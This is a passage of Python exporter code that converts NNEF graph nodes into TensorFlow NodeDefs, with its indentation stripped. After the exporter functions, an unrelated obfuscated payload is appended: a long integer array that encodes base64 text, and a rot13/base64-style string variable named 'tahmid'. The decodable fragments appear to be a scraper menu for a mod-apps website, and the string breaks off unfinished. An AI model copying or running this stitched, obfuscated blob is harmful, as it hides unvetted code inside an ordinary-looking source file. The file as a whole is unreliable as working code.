self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_shape_of(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Shape')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
tfnode.attr['out_type'].type = 3
self.tf_graph.node.extend([tfnode])
def export_sigmoid(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sigmoid')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sign(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sign')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_slice(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Slice')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['Index'].type = 3
tfnode_begin = NodeDef(name=self.format_name(nnef_node.name) + '/begin', op='Const')
tfnode_begin.attr['dtype'].type = 3
tfnode_begin.attr['value'].tensor.dtype = 3
tfnode_begin.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['begin'])
begin_array = nnef_node.parameters['begin'][:]
for i in range(len(begin_array)):
if begin_array[i] == -1:
begin_array[i] = 0
if len(begin_array) == 1:
tfnode_begin.attr['value'].tensor.int_val.extend([begin_array[0]])
else:
size_array = np.asarray(begin_array)
tfnode_begin.attr['value'].tensor.tensor_content = np.asarray(size_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_begin])
tfnode_size = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_size.attr['dtype'].type = 3
tfnode_size.attr['value'].tensor.dtype = 3
tfnode_size.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['end'])
end_array = nnef_node.parameters['end'][:]
for i in range(len(end_array)):
if end_array[i] == 0:
end_array[i] = nnef_node.output_shape[i] - begin_array[i]
else:
end_array[i] = end_array[i] - begin_array[i]
if len(end_array) == 1:
tfnode_size.attr['value'].tensor.int_val.extend([end_array[0]])
else:
size_array = np.asarray(end_array)
tfnode_size.attr['value'].tensor.tensor_content = np.asarray(size_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_size])
tfnode.input.extend([tfnode_begin.name])
tfnode.input.extend([tfnode_size.name])
self.tf_graph.node.extend([tfnode])
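# export_softmax flattens inputs of rank != 2 to [batch, prod(rest)] with a
# Const shape + Reshape pair in front of the Softmax node, since this
# exporter always feeds Softmax a 2-D tensor.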
def export_softmax(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softmax')
if len(nnef_node.output_shape) != 2:
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/shape', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = 2
size = 1
for i in range(1,len(nnef_node.output_shape)):
size *= nnef_node.output_shape[i]
new_shape = [nnef_node.output_shape[0], size]
tfnode_shape.attr['value'].tensor.tensor_content = np.asarray(new_shape, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode_reshape = NodeDef(name=self.format_name(nnef_node.name) + '/reshape', op='Reshape')
self.add_input(tfnode_reshape, nnef_node, 'x')
tfnode_reshape.input.extend([self.format_name(nnef_node.name) + '/shape'])
tfnode_reshape.attr['T'].type = 1
tfnode_reshape.attr['Tshape'].type = 3
self.tf_graph.node.extend([tfnode_reshape])
tfnode.input.extend([self.format_name(nnef_node.name) + '/reshape'])
else:
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_softplus(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softplus')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_softsign(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softsign')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
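# export_split recovers the base TF name from the bracketed NNEF output list
# ("[a, b, ...]") and emits a split_dim Const plus a Split node.  Note that
# TF's Split op divides the axis evenly; unequal 'ratios' would require
# SplitV, which is not generated here.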
def export_split(self, nnef_node):
tfnode_name = nnef_node.name[1:nnef_node.name.find(',')]
tfnode_const = NodeDef(name=self.format_name(tfnode_name) + '/split_dim', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.dtype = 3
tfnode_const.attr['value'].tensor.int_val.extend([nnef_node.parameters['axis']])
self.tf_graph.node.extend([tfnode_const])
tfnode = NodeDef(name=self.format_name(tfnode_name), op='Split')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'value')
tfnode.attr['T'].type = 1
tfnode.attr['num_split'].i = len(nnef_node.parameters['ratios'])
self.tf_graph.node.extend([tfnode])
def export_sqr(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Square')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sqrt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sqrt')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sub(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sub')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sum_reduce(self, nnef_node):
#Generate const node for axis
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sum')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_tanh(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Tanh')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_transpose(self, nnef_node):
tfnode_perm = NodeDef(name=self.format_name(nnef_node.name) + '/perm', op='Const')
tfnode_perm.attr['dtype'].type = 3
tfnode_perm.attr['value'].tensor.dtype = 3
tfnode_perm.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['axes'])
tfnode_perm.attr['value'].tensor.tensor_content = np.asarray(nnef_node.parameters['axes'], dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_perm])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Transpose')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_perm.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tperm'].type = 3
self.tf_graph.node.extend([tfnode])
def export_update(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Identity')
self.add_input(tfnode, nnef_node, 'value')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_variable(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Const')
tfnode.attr['dtype'].type = 1
tfnode.attr['value'].tensor.dtype = 1
self.tf_graph.node.extend([tfnode])
108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 99, 75, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 111, 67, 68, 52, 111, 67, 68, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 87, 100, 67, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 107, 101, 75, 86, 109, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 86, 109, 117, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 65, 103, 43, 75, 65, 103, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 86, 109, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 110, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 
79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 119, 114, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 103, 73, 80, 105, 103, 73, 80, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 90, 114, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 69, 75, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 111, 67, 68, 52, 111, 67, 68, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 
87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 67, 103, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 116, 51, 76, 108, 74, 70, 82, 72, 49, 98, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 100, 106, 69, 117, 77, 72, 116, 51, 76, 108, 74, 70, 82, 72, 49, 100, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 73, 69, 90, 80, 84, 69, 120, 80, 86, 121, 66, 74, 84, 108, 78, 85, 81, 85, 100, 83, 81, 85, 48, 103, 81, 86, 86, 85, 83, 69, 57, 83, 73, 69, 66, 80, 83, 107, 70, 79, 76, 107, 78, 90, 85, 48, 86, 68, 101, 51, 99, 117, 82, 85, 53, 69, 102, 83, 99, 110, 74, 121, 107, 75, 67, 109, 78, 116, 90, 67, 103, 110, 89, 50, 120, 108, 89, 88, 73, 110, 75, 81, 112, 105, 89, 87, 53, 117, 90, 88, 73, 111, 75, 81, 112, 119, 99, 109, 108, 117, 100, 67, 104, 109, 74, 121, 99, 110, 67, 110, 116, 51, 76, 108, 74, 70, 82, 72, 49, 98, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 77, 88, 116, 51, 76, 108, 74, 70, 82, 72, 49, 100, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 73, 69, 49, 70, 84, 107, 70, 78, 85, 69, 108, 77, 83, 48, 70, 79, 73, 70, 78, 70, 84, 86, 86, 66, 73, 69, 70, 81, 84, 69, 108, 76, 81, 86, 78, 74, 73, 69, 49, 80, 82, 65, 112, 55, 100, 121, 53, 83, 82, 85, 82, 57, 87, 51, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 84, 74, 55, 100, 121, 53, 83, 82, 85, 82, 57, 88, 88, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 83, 66, 78, 82, 85, 53, 68, 81, 86, 74, 74, 73, 70, 78, 70, 81, 108, 86, 66, 83, 67, 66, 66, 85, 69, 120, 74, 83, 48, 70, 84, 83, 83, 66, 78, 84, 48, 81, 75, 74, 121, 99, 110, 75, 81, 111, 75, 99, 121, 65, 57, 73, 70, 78, 108, 99, 51, 78, 112, 98, 50, 52, 111, 75, 81, 111, 75, 98, 51, 66, 122, 97, 83, 65, 57, 73, 71, 108, 117, 100, 67, 104, 112, 98, 110, 66, 49, 100, 67, 104, 109, 74, 121, 99, 110, 101, 51, 99, 117, 85, 107, 86, 69, 102, 101, 75, 86, 114, 101, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 72, 116, 51, 76, 108, 74, 70, 82, 72, 48, 111, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 85, 69, 108, 77, 83, 85, 103, 103, 84, 49, 66, 84, 83, 88, 116, 51, 76, 108, 74, 70, 82, 72, 48, 112, 52, 111, 67, 84, 87, 51, 116, 51, 76, 107, 86, 79, 82, 72, 49, 55, 100, 121, 53, 67, 84, 48, 120, 69, 102, 85, 66, 80, 83, 107, 70, 79, 76, 107, 78, 90, 85, 48, 86, 68, 101, 51, 99, 117, 85, 107, 86, 69, 102, 86, 48, 75, 101, 51, 99, 117, 85, 107, 86, 69, 102, 101, 75, 86, 115, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 85, 103, 79, 75, 101, 115, 105, 66, 55, 100, 121, 53, 68, 87, 85, 70, 79, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 74, 121, 99, 110, 75, 83, 107, 75, 99, 72, 74, 112, 98, 110, 81, 111, 100, 121, 53, 70, 84, 107, 81, 112, 67, 103, 112, 112, 90, 105, 66, 118, 99, 72, 78, 112, 73, 68, 48, 57, 73, 68, 69, 54, 67, 105, 65, 103, 73, 67, 66, 48, 73, 68, 48, 103, 85, 72, 74, 108, 100, 72, 82, 53, 86, 71, 70, 105, 98, 
71, 85, 111, 87, 121, 100, 79, 84, 121, 99, 115, 73, 67, 100, 79, 81, 85, 49, 66, 74, 121, 119, 103, 74, 48, 116, 80, 82, 69, 85, 110, 76, 67, 65, 110, 86, 69, 70, 79, 82, 48, 100, 66, 84, 67, 100, 100, 75, 81, 111, 103, 73, 67, 65, 103, 89, 50, 49, 107, 75, 67, 100, 106, 98, 71, 86, 104, 99, 105, 99, 112, 67, 105, 65, 103, 73, 67, 66, 105, 89, 87, 53, 117, 90, 88, 73, 111, 75, 81, 111, 103, 73, 67, 65, 103, 97, 71, 57, 116, 90, 88, 66, 104, 90, 50, 85, 103, 80, 83, 66, 122, 76, 109, 100, 108, 100, 67, 103, 110, 97, 72, 82, 48, 99, 72, 77, 54, 76, 121, 57, 116, 98, 50, 82, 107, 97, 87, 53, 110, 100, 87, 53, 112, 100, 71, 86, 107, 76, 110, 104, 53, 101, 105, 99, 112, 76, 110, 82, 108, 101, 72, 81, 75, 73, 67, 65, 103, 73, 72, 82, 118, 100, 71, 70, 115, 73, 68, 48, 103, 89, 110, 77, 111, 97, 71, 57, 116, 90, 88, 66, 104, 90, 50, 85, 115, 73, 67, 100, 115, 101, 71, 49, 115, 74, 121, 107, 117, 90, 109, 108, 117, 90, 70, 57, 104, 98, 71, 119, 111, 74, 50, 69, 110, 76, 67, 66, 55, 74, 50, 78, 115, 89, 88, 78, 122, 74, 122, 111, 103, 74, 51, 66, 104, 90, 50, 85, 116, 98, 110, 86, 116, 89, 109, 86, 121, 99, 121, 100, 57, 75, 86, 115, 120, 88, 83, 53, 48, 90, 88, 104, 48, 67, 105, 65, 103, 73, 67, 66, 106, 98, 51, 86, 117, 100, 67, 65, 57, 73, 68, 65, 75, 73, 67, 65, 103, 73, 71, 90, 118, 99, 105, 66, 112, 73, 71, 108, 117, 73, 72, 74, 104, 98, 109, 100, 108, 75, 71, 108, 117, 100, 67, 104, 48, 98, 51, 82, 104, 98, 67, 107, 115, 73, 68, 65, 115, 73, 67, 48, 120, 75, 84, 111, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 49, 99, 109, 119, 103, 80, 83, 65, 110, 97, 72, 82, 48, 99, 72, 77, 54, 76, 121, 57, 116, 98, 50, 82, 107, 97, 87, 53, 110, 100, 87, 53, 112, 100, 71, 86, 107, 76, 110, 104, 53, 101, 105, 57, 119, 89, 87, 100, 108, 76, 51, 116, 57, 74, 121, 53, 109, 98, 51, 74, 116, 89, 88, 81, 111, 97, 83, 107, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 121, 73, 68, 48, 103, 99, 121, 53, 110, 90, 88, 81, 111, 100, 88, 74, 115, 75, 81, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 78, 118, 100, 88, 65, 103, 80, 83, 66, 105, 99, 121, 104, 121, 76, 110, 82, 108, 101, 72, 81, 115, 73, 67, 100, 115, 101, 71, 49, 115, 74, 121, 107, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 109, 98, 51, 73, 103, 97, 83, 66, 112, 98, 105, 66, 121, 90, 88, 90, 108, 99, 110, 78, 108, 90, 67, 104, 121, 89, 87, 53, 110, 90, 83, 103, 119, 76, 67, 65, 120, 77, 83, 107, 112, 79, 103, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 48, 99, 110, 107, 54, 67, 105, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 66, 106, 98, 51, 86, 117, 100, 67, 65, 57, 73, 71, 78, 118, 100, 87, 53, 48, 75, 122, 69, 75, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 82, 104, 90, 121, 65, 57, 73, 72, 78, 118, 100, 88, 65, 117, 90, 109, 108, 117, 90, 70, 57, 104, 98, 71, 119, 111, 74, 50, 70, 121, 100, 71, 108, 106, 98, 71, 85, 110, 75, 86, 116, 112, 88, 81, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 100, 71, 108, 48, 98, 71, 85, 103, 80, 83, 66, 48, 89, 87, 99, 117, 90, 109, 108, 117, 90, 67, 103, 110, 97, 68, 77, 110, 76, 67, 66, 55, 74, 50, 78, 115, 89, 88, 78, 122, 74, 122, 111, 110, 90, 87, 53, 48, 99, 110, 107, 116, 100, 71, 108, 48, 98, 71, 85, 110, 102, 83, 107, 117, 100, 71, 86, 52, 100, 65, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 67, 65, 103, 98, 71, 108, 117, 97, 121, 65, 57, 73, 72, 82, 104, 90, 121, 53, 109, 97, 87, 
53, 107, 75, 67, 100, 104, 74, 121, 108, 98, 74, 50, 104, 121, 90, 87, 89, 110, 88, 83, 53, 121, 90, 88, 66, 115, 89]
tahmid = 'JAyXPqbqUEjpmbiY21iMTEcozq1ozy0MJDhrUy6YlpfVPpaXF5lMKOfLJAyXPpiWljtWlpcPvNtVPNtVPNtVPNtVPNtVPOxLKEyVQ0tqTSaYzMcozDbW3EcoJHaXF50MKu0PvNtVPNtVPNtVPNtVPNtVPO0YzSxMS9lo3pbJ2AiqJ50YPO0nKEfMFjtoTyhnljtMTS0MI0cPvNtVPNtVPNtVPNtVTI4L2IjqPOSrTAypUEco24tLKZtEGbXVPNtVPNtVPNtVPNtVPNtVUOlnJ50XRHcPvNtVPOjpzyhqPu3YxWCGRDcPvNtVPOjpzyhqPu0XDbXVPNtVTgiMTIsLKOeVQ0tnJ5jqKDbMvpaWjc7ql5FEHE94cJg4cFN4cFN4cFN4cFNr3phHxIRsFu7ql5SGxE9r3phDx9ZEU1ADIAIF0gOGvOYG0ESVRSDGRyYDIAWr3phHxIRsFavtWAor3phEH5RsKg3YxWCGRE9DR9XDH4hD1yGEHA7ql5FEHE9KDc7ql5FEHE94cJj4cFN4cFN4cFN4cFN4c6lVUg3YxAMDH59r3phDx9ZEU0aWlpcPvNtVPOwoJDbW2AfMJSlWlxXVPNtVTWuoz5ypvtcPtbtVPNto3Oyoy9jLJqyVQ0tpl5aMKDbW2u0qUOmBv8ioJ9xMTyhM3IhnKEyMP54rKbiWlNeVTgiMTIsLKOeXF50MKu0PvNtVPOcMvNaHTSaMFOFMJ1iqzIxWlOcovOipTIhK3OuM2H6PvNtVPNtVPNtpUWcoaDbMvpaWjc7ql5FEHE94cJg4cFN4cFN4cFN4cFNr3phHxIRsFu7ql5SGxE9r3phDx9ZEU1HEIWXDHEWVRgSH0SZDHuOGag3YyWSEU0c4bPGJ3g3YxIBEU17ql5PG0kRsHOCFxSBYxAMH0IQr3phHxIRsI0Xr3phHxIRsrXIfBXHtBXHtBXHtBXHtBXrfvO7ql5QJHSBsKg3YxWCGRE9F09REFOOHRkWF0SGFFOGDHkOFPRaWlpcPvNtVPNtVPNtMKucqPtcPvNtVPOmo3IjVQ0tLaZbo3Oyoy9jLJqyY